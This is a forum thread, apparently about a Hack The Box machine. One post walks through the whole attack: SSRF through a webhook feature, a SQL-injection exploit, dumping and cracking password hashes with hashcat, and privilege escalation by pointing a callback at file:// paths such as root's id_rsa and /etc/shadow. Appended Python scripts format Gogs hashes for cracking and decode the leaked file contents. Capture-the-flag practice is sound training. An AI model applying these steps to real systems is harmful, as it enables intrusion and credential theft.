August 22, 2022 at 4:04 AM
(August 22, 2022, 03:34 AM) NoobHTB Wrote:
(August 21, 2022, 09:10 PM) hackthebaaax Wrote: Someone help me to break the hash? I have the passwd and salt but I can't break it; maybe my format is wrong.
Have you cracked the hash?
Yeah.

August 22, 2022 at 4:11 AM
(August 22, 2022, 04:04 AM) hackthebaaax Wrote:
(August 22, 2022, 03:34 AM) NoobHTB Wrote:
(August 21, 2022, 09:10 PM) hackthebaaax Wrote: Someone help me to break the hash? I have the passwd and salt but I can't break it; maybe my format is wrong.
Have you cracked the hash?
Yeah.
I have PM'd you, could you check it?

August 22, 2022 at 6:52 AM
(August 21, 2022, 07:16 AM) rdre8 Wrote: This one warms up after about 4:00 and discusses SSRF and webhooks in general terms: https://www.youtube.com/watch?v=xF2XUKtYaTg
That makes sense and is helpful, thank you.

August 22, 2022 at 8:16 AM
If you struggle formatting the hashcat hash, use this tool: https://github.com/shinris3n/GogsToHashcat
Enjoy :)

August 22, 2022 at 3:00 PM
For all the new people trying to learn the basics of this room: it should be considered a medium box if you don't have any other experience with SQLi or SSRF. Here's a little summary of the correct path to follow (mostly explained in this thread) without too many spoilers....:
- Your nmap scan should have reported 2 open ports and 1 filtered port, right? (If not, scan again...)
- Let's leave the 22 and the other port for later, and let's see what's on the web port (80).
- Looks like a health check page, with webhooks, callbacks and everything.
- Try listening on two ports with netcat, for example listen on port 9999 and on port 1337 (because we are h4x0rs). Use the port 9999 as your "Payload URL" and the port 1337 as the "Monitored URL"
- Try the "Test" option. You should receive the connection on port 1337 first, and if you hit CTRL-C you will receive the second connection, with some information, on port 9999. This should start giving you some ideas about the attack vector....
- Get back to your nmap report: we found a "filtered" port... Maybe we can access this port through the health check page, like [hidden content]. Unluckily this is filtered, but we can use an HTTP redirector. That is basically a "server" that listens on a desired port and redirects all the requests to a desired link, in this case port 3000 of the victim machine. (Google it, it's quite common and not so hard to use; otherwise, check some previous replies in this thread.)
- Great! Now we can see the service and version that's listening on port 3000! Do you see that? It's an old version... We have for sure some kind of exploit... (Google is your friend). You will finally get an [hidden content]. CHECK THE NOTE FROM THE EXPLOIT! There are some bad chars!!
- Start enumerating the database: version, schema, tables, columns, and finally dump the things that you need!
- Now with all that data, we need to format it in order to crack it; if you google something like "[thenameoftheservice]{G**} hash format for hashcat", you will find the formatter, and I think someone already posted it here...
- Format it, crack it with hashcat, mode "10900" and rockyou; it should not take too long, maybe 5 mins; if you pass 90k tried passwords, something is wrong....
- Yes! You now have the plain text password, use it on SSH.
- Root part: @11231123 made a great summary, so I'll try not to make it too deep on the topics...
- Check the background jobs: use pspy or create a procmon with bash (useful if you don't want to download and upload binaries...)
- Someone with high privileges is running a cron job on a directory that you can read...
- Get as much information as possible about that "function/binary" on Google, and check the source code: what function is vulnerable? How did you get your foothold? Can you use it to escalate privileges?
- Get the MySQL credentials from the environment file, and log in to the service with those credentials.
- Now create a simple "Health check" web-hook from the page, where the "Payload URL" is going to be the listener where you receive the file that you want.
- Inside the database, you will find a table with a showy name... If you select all the values inside it, you will find your PE vector....
- If you did all the above steps, this is not necessary, but if you didn't... here we go --> update the value of the "Monitored URL" inside the table to a file that you want to read, like the id_rsa of root or the root.txt flag or /etc/shadow, whatever... use the "file wrapper" (I mean file:///tmp/file.txt).
- If you did everything right, after a minute or so you should receive a connection to your listener with the content of the file. (Remember that's JSON-safe encoded, so you should replace all the \t with a TAB, all the \n with a LINEBREAK, remove backslashes [\] and you are done!)
- PWNED! :D
I hope I have been as clear as possible, without giving too many hints.... Sorry for the long reply... but it's almost a full writeup xD

August 22, 2022 at 3:12 PM
(August 22, 2022, 03:00 PM) lnf02 Wrote: For all the new people trying to learn the basics of this room: it should be considered a medium box if you don't have any other experience with SQLi or SSRF. Here's a little summary of the correct path to follow (mostly explained in this thread) without too many spoilers....
Great, thanks!

August 22, 2022 at 3:23 PM
(August 22, 2022, 03:00 PM) lnf02 Wrote: For all the new people trying to learn the basics of this room: it should be considered a medium box if you don't have any other experience with SQLi or SSRF.
Here's a little summary of the correct path to follow (mostly explained in this thread) without too many spoilers....
Thanks!!!

August 22, 2022 at 4:01 PM
Great, thanks!

August 22, 2022 at 4:03 PM
!!!!!!!!!!!!!!

August 22, 2022 at 4:25 PM
Thanks, dude.
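Several posts in this thread turn on getting the stored passwd and salt into the line format hashcat mode 10900 (PBKDF2-HMAC-SHA256) expects. The script below is an added example, written for this page; it is not the thread's code and not the GogsToHashcat tool linked above. It assumes the stored `passwd` is the hex of PBKDF2-HMAC-SHA256 over the password and salt with 10000 iterations and a 50-byte derived key (how I understand Gogs' EncodePasswd; treat those parameters as an assumption), and that the 10900 line is `sha256:<iterations>:<base64 salt>:<base64 digest>`. The user record it works on is constructed so the result can be checked locally with `verify_candidate`, which is also the function a defender would use to confirm a recovered password is real before forcing a reset.

```python
"""
Added example (not from the thread, not the GogsToHashcat tool it links):
format a Gogs-style stored password hash for hashcat mode 10900
(PBKDF2-HMAC-SHA256) and verify a candidate password locally.

Assumptions, labelled because the thread does not spell them out:
  * `passwd` is the hex of PBKDF2-HMAC-SHA256(password, salt) with
    10000 iterations and a 50-byte derived key (my reading of Gogs' EncodePasswd).
  * hashcat's 10900 line format is `sha256:<iterations>:<b64 salt>:<b64 digest>`.
The sample user record below is constructed for this demo.
"""
import base64
import hashlib
import hmac

GOGS_ITERATIONS = 10000   # assumption: Gogs default iteration count
GOGS_DKLEN = 50           # assumption: Gogs default derived-key length in bytes


def gogs_encode_passwd(password: str, salt: str) -> str:
    """Reproduce the stored `passwd` column value: hex of the PBKDF2 digest."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(),
                             GOGS_ITERATIONS, GOGS_DKLEN)
    return dk.hex()


def gogs_to_hashcat(passwd_hex: str, salt: str, iterations: int = GOGS_ITERATIONS) -> str:
    """Build the hashcat -m 10900 input line from the hex digest and the plain salt."""
    digest = bytes.fromhex(passwd_hex)            # ValueError if the column is not clean hex
    b64_salt = base64.b64encode(salt.encode()).decode()
    b64_digest = base64.b64encode(digest).decode()
    return f"sha256:{iterations}:{b64_salt}:{b64_digest}"


def parse_hashcat_line(line: str) -> tuple[int, bytes, bytes]:
    """Inverse of gogs_to_hashcat; handy for sanity-checking a formatter's output."""
    algo, iters, b64_salt, b64_digest = line.split(":")
    if algo != "sha256":
        raise ValueError(f"unexpected algorithm tag {algo!r}")
    return int(iters), base64.b64decode(b64_salt), base64.b64decode(b64_digest)


def verify_candidate(passwd_hex: str, salt: str, candidate: str) -> bool:
    """Check one candidate password against the stored digest (constant-time compare)."""
    return hmac.compare_digest(gogs_encode_passwd(candidate, salt), passwd_hex)


# Constructed sample record: a user whose password we know, so the demo is checkable.
SAMPLE_SALT = "abcdefghij"          # Gogs salts are 10 characters; this one is made up
SAMPLE_PASSWORD = "correct horse"   # constructed
SAMPLE_PASSWD_HEX = gogs_encode_passwd(SAMPLE_PASSWORD, SAMPLE_SALT)

if __name__ == "__main__":
    line = gogs_to_hashcat(SAMPLE_PASSWD_HEX, SAMPLE_SALT)
    print("hashcat -m 10900 input:", line)
    iters, salt, digest = parse_hashcat_line(line)
    print("round-trip ok:", iters == GOGS_ITERATIONS and salt.decode() == SAMPLE_SALT
          and digest.hex() == SAMPLE_PASSWD_HEX)
    print("candidate matches:", verify_candidate(SAMPLE_PASSWD_HEX, SAMPLE_SALT, SAMPLE_PASSWORD))
```

The round trip through `parse_hashcat_line` is the check worth running before a long cracking job: if the salt or digest does not come back byte-for-byte, the formatter (or a stray whitespace/hex problem in the dumped column) is the bug, which is the situation the first posts in this thread describe.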
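The last steps of lnf02's summary describe the webhook callback arriving at a listener with the file content JSON-encoded inside it, and unescaping it by hand. The following is an added example, not code from the thread or from the service on the box: it does that unescaping with a JSON parser, which also preserves literal backslashes and escaped quotes in the file. The captured request, the `body` field name and the other field names are constructed for the demo; the real callback's field names are an assumption.

```python
"""
Added example (not from the thread): recover file content from a webhook
callback that carries it as a JSON string. lnf02's summary unescapes by hand
(\t -> TAB, \n -> LINEBREAK, drop backslashes); this does the same job with a
JSON parser, keeping literal backslashes and escaped quotes intact.
The captured request and its field names are constructed for the demo.
"""
import json
from typing import Optional

# Constructed sample: what a raw listener might capture from the callback POST.
# The "body" field holds the JSON-encoded content of a small passwd-like file
# that deliberately contains a tab, escaped quotes and a literal backslash.
CONSTRUCTED_CALLBACK = (
    "POST / HTTP/1.1\r\n"
    "Host: 10.10.14.2:9999\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"monitoredUrl": "file:///tmp/file.txt", "status": 200, '
    '"body": "root:x:0:0:root:/root:/bin/bash\\nalice:x:1000:1000:\\"A. Liddell\\":'
    '/home/alice:/bin/bash\\nnote\\tC:\\\\path\\n"}'
)


def split_http_request(raw: str) -> tuple[dict, str]:
    """Separate the header block from the body of a raw captured HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:        # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def extract_file_content(raw_request: str, field: str = "body") -> Optional[str]:
    """Return the decoded file content carried in the JSON callback, or None.

    None is returned when the request is not JSON, does not parse, or the
    field is missing or not a string, so a caller can tell 'no file' from
    'empty file'.
    """
    headers, body = split_http_request(raw_request)
    if not headers.get("content-type", "").startswith("application/json"):
        return None
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return None
    content = payload.get(field) if isinstance(payload, dict) else None
    return content if isinstance(content, str) else None


if __name__ == "__main__":
    content = extract_file_content(CONSTRUCTED_CALLBACK)
    print(content if content is not None else "no JSON file content in request")
```

Feeding a raw netcat capture to `extract_file_content` prints the file exactly as it was read on the host, including the `C:\path` line that a blanket backslash removal would turn into `C:path`. The same parsing is what a defender would put behind an egress-monitoring listener to see what an SSRF-driven callback actually carried.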